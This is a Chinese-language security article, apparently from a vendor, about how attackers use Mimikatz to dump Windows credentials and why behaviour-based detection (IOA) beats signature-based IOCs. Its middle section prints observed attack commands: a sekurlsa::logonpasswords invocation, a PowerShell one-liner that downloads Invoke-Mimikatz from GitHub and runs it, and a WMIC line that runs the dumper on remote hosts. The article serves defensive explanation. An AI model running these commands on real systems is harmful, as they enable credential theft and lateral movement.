簡單而粗暴:網路攻擊界的AK47
Mimikatz是一款廣受資訊駭客與流氓國家歡迎的開源提權工具包。很多資安界的人士都聽說過這款工具的大名。對於沒有聽說過的人而言,那就是一個巨大的威脅。這款工具堪稱網路攻擊武器庫中的AK47,即便沒到入侵者人手一把的程度,也幾乎可以當成是網路攻擊標準配備了。對此一無所知的人可能面臨或已經遭遇了它的侵害。
無論對手是誰,幾乎所有Windows入侵當中都能見到它的身影。這不僅僅是一種流行的憑證獲取方法,也是針對性攻擊者和滲透測試人員都常用的憑證獲取工具,因為這工具對於繞過基於特徵碼檢測的功能和有效性都十分強大。
攻擊者常會尋找有效憑證以提高許可權限,並擴大其在目標環境中的染指範圍,獲得有效憑證的方法也是八仙過海各顯神通,有些攻擊者甚至針對同一個目標都會採用多種憑證盜竊技術。
Mimikatz採用4種主要方式:
- 修改可執行檔名稱
- 運用批次檔
- 採用PowerShell變種
- 改變命令列選項
我們仔細分析一下。
- 隱蔽:修改可執行檔名稱
攻擊者使用該工具最簡單直接的方法就是將其拷貝到被入侵的系統中,修改可執行檔的檔案名,用以下命令列啟動之:
c:\ProgramData\p.exe “”privilege::debug””
“”sekurlsa::logonpasswords””
如此這般,系統的憑證資訊便落入了攻擊者手中。
- 有效:使用批次檔
運用該工具的其他方式還包括採用批次檔將工具複製到目標系統執行,然後將結果輸出到一個檔,並將該輸出檔複製回中心收集點,最後再在目標系統上刪除所有相關檔。
- 召喚力量支援:採用PowerShell變種
採用Mimikatz的PowerShell變種是又一種獲取目標系統憑證資訊的方法,比如:
powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -Command ‘privilege::debug sekurlsa::logonpasswordsexit’
- 改變命令列選項
2018年第四季度見證了Mimikatz工具的另類用法,尤其是修改命令列選項的一種:
mnl.exe pr::dg sl::lp et -p
該特殊的Mimikatz變種通過WMIC.exe對多個目標系統下手,比如:
Wmic /NODE:”[REDACTED]” /USER:”[REDACTED]” /password:[REDACTED] process call create “cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt”
花招百出:需要全面的應對方法
這一系列有效戰術充分顯示出監測攻擊指標(IOA)的重要性。每種技術都是逃避脆弱檢測方法的嘗試,這些脆弱檢測方法要麼只檢測命令列選項以推斷其目的,要麼只檢查二進位檔案中有沒有出現相關字串。
攻擊者可以運用多種技術獲取憑證資訊,但公司企業需要一定程度的可見性以便防禦者能夠觀察到攻擊者所用的新技術,包括被特別用於繞過和顛覆檢測機制的那些。
攻擊指標(IOA)專注於攻擊技術的行為特徵,而不是像檔案名、散列值或單個命令列選項這樣的傳統入侵指標(IOC)。新一代IOA過程能賦予防禦者看清新攻擊技術的能力,即便攻擊者使用了專門的規避或顛覆檢測機制的方法。這是因為IOA著眼攻擊者的意圖,而萬變不離其宗,無論攻擊者使用哪種惡意軟體或漏洞利用程式,終歸逃不脫其惡意目的,只要盯緊攻擊意圖,攻擊便無所遁形。
網路取證領域中,IOC往往被描述為電腦上留存的指征網路安全被破壞的證據。在接到可疑事件通報,或是定期檢查,亦或發現網路中非正常呼出後,調查人員往往會去收集這些資料。理想狀況下,這些資訊被收集以後能夠創建更智慧的工具,可以檢測並隔離未來的可疑檔。因為IOC提供的是跟蹤壞人的反應式方法,當你發現IOC時,有極大的可能性已經被黑了。
此類IOC指征一系列惡意活動,從簡單的I/O操作到提權都有。注重行為特徵的IOA關聯則將這些指標都綜合到一起,用以檢測並防止惡意行為。其結果就是連通過反射注入PowerShell模組進行的憑證盜竊都能檢測出來的防禦技術,可以在攻擊者實際觀測到憑證前扼住該憑證盜取行為。
與基於特徵碼的殺毒軟體類似,基於IOC的檢測方法無法檢測無惡意軟體的威脅和零日漏洞攻擊。因此,公司企業紛紛轉向基於IOA的方法以便更好地適應其安全需求。
